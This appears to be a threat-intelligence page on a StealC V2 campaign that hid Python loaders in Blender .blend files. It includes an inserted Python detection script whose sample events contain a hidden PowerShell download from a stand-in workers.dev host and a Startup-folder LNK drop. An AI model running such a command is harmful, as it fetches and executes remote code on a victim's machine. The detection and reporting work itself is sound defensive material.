StealC V2 weaponized Blender asset delivery
Malware Activity
Summary
The StealC V2 malware is being spread through manipulated Blender .blend files, creating a new delivery path that can compromise users who open routine 3D assets. If Auto Run is enabled, hidden Python code starts a multistage infection that can install persistence and pull more payloads. The activity has been observed for at least six months and uses Pyramid C2 for encrypted payload retrieval, increasing the chance of successful credential theft and foothold retention.
Related Happenings
Gremlin stealer modular toolkit evolution
Malware Activity
First: 15.05.2026 17:19
Last: 15.05.2026 17:19
Sources 1
About this happening:
The **Gremlin stealer** malware has expanded into a **modular toolkit** with **session-hijacking** and **crypto clipping** capabilities, raising the risk of credential theft and a...
PCPJack worm-like credential theft framework
Malware Activity
First: 07.05.2026 20:45
Last: 07.05.2026 20:45
Sources 1
About this happening:
The **PCPJack** malware framework now conducts **credential theft** across exposed cloud infrastructure, raising the risk of account takeover and follow-on intrusion. It matters b...
Blender malicious .blend file campaign delivering StealC V2
Campaign
First: 25.11.2025 13:28
Last: 25.11.2025 13:28
Sources 1
How related:
"This ongoing operation, active for at least six months, involves implanting malicious .blend files on platforms like CGTrader,"
About this happening:
A **six-month** malicious-file campaign is abusing **Blender .blend files** on **CGTrader** to execute embedded scripts and deliver **StealC V2**, putting 3D asset downloaders at...
Russian-linked StealC V2 Blender marketplace delivery campaign
Campaign
First: 25.11.2025 00:00
Last: 25.11.2025 00:00
Sources 1
How related:
A Russian-linked campaign delivers the StealC V2 information stealer malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.
About this happening:
A **Russian-linked campaign** is distributing **StealC V2** through malicious **.blend files** on **3D model marketplaces** and putting **Blender users** at risk of credential the...
AkdoorTea backdoor delivered through Windows batch-script ZIP chain
Malware Activity
First: 25.09.2025 16:14
Last: 25.09.2025 16:14
Sources 1
About this happening:
The newly documented **AkdoorTea** backdoor is being delivered through a **Windows batch script**, expanding the malware toolkit used against targeted developers. The delivery cha...
Timeline
24.11.2025 16:00 2 articles · 6mo ago
Morphisec discloses StealC V2 hidden in Blender .blend files
Initial Disclosure: Morphisec said Russian-speaking threat actors were distributing StealC V2 through manipulated Blender .blend files on CGTrader and similar platforms; when victims opened routine 3D assets with Blender's Auto Run feature enabled, concealed Python scripts launched a multistage infection. The chain began with a tampered Rig_Ui.py script, fetched a loader from workers.dev, downloaded PowerShell and ZIP payloads, created LNK files for persistence, and used Pyramid C2 channels to retrieve encrypted payloads; Morphisec also said its deception-based controls stopped the credential theft before exfiltration or persistence could occur.
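As an added illustration (not code from Morphisec or from the page), the kind of detection logic a SOC could run over endpoint telemetry for the chain described above: Blender spawning PowerShell, a download from a workers.dev host, and an LNK dropped into a Startup folder. The event field names and the sample events are constructed assumptions, not a real log schema or observed indicators.

```python
# Added example: flag the behaviours of the reported chain in constructed process
# and file events. Field names (kind, parent, image, cmdline, target) are assumptions
# loosely modelled on Sysmon process-creation and file-creation events.
import re

# Persistence in the reported chain used LNK files; flag .lnk creation in a Startup folder.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
# The loader was fetched from a workers.dev host; flag command lines pulling from one.
LOADER_HOST_RE = re.compile(r"https?://[^\s\"']*\bworkers\.dev\b", re.IGNORECASE)

def classify(event):
    """Return the list of finding labels for one event (empty when nothing matches)."""
    findings = []
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    # Blender has no legitimate reason to launch PowerShell; the script embedded in
    # the .blend file did exactly that to run the downloaded stages.
    if parent.endswith("blender.exe") and image.endswith("powershell.exe"):
        findings.append("blender_spawns_powershell")
    if LOADER_HOST_RE.search(event.get("cmdline", "")):
        findings.append("workers_dev_download")
    if event.get("kind") == "file_create" and STARTUP_RE.search(event.get("target", "")):
        findings.append("startup_lnk_persistence")
    return findings

def scan(events):
    """Map each event index to its findings, leaving out clean events."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}

# Constructed sample events; hostnames and paths are illustrative placeholders.
SAMPLE_EVENTS = [
    {"kind": "process_create", "parent": r"C:\Program Files\Blender\blender.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"iwr https://example-loader.workers.dev/stage\""},
    {"kind": "file_create", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": "", "cmdline": "",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # A normal launch of Blender from Explorer produces no finding.
    {"kind": "process_create", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Blender\blender.exe", "cmdline": "blender.exe model.blend"},
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS).items():
        print(idx, labels)
```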
Sources:
- Russian-linked Malware Campaign Hides in Blender 3D Files — www.infosecurity-magazine.com — 24.11.2025 16:00
- Hackers Hijack Blender 3D Assets to Deploy StealC V2 Data-Stealing Malware — thehackernews.com — 25.11.2025 13:28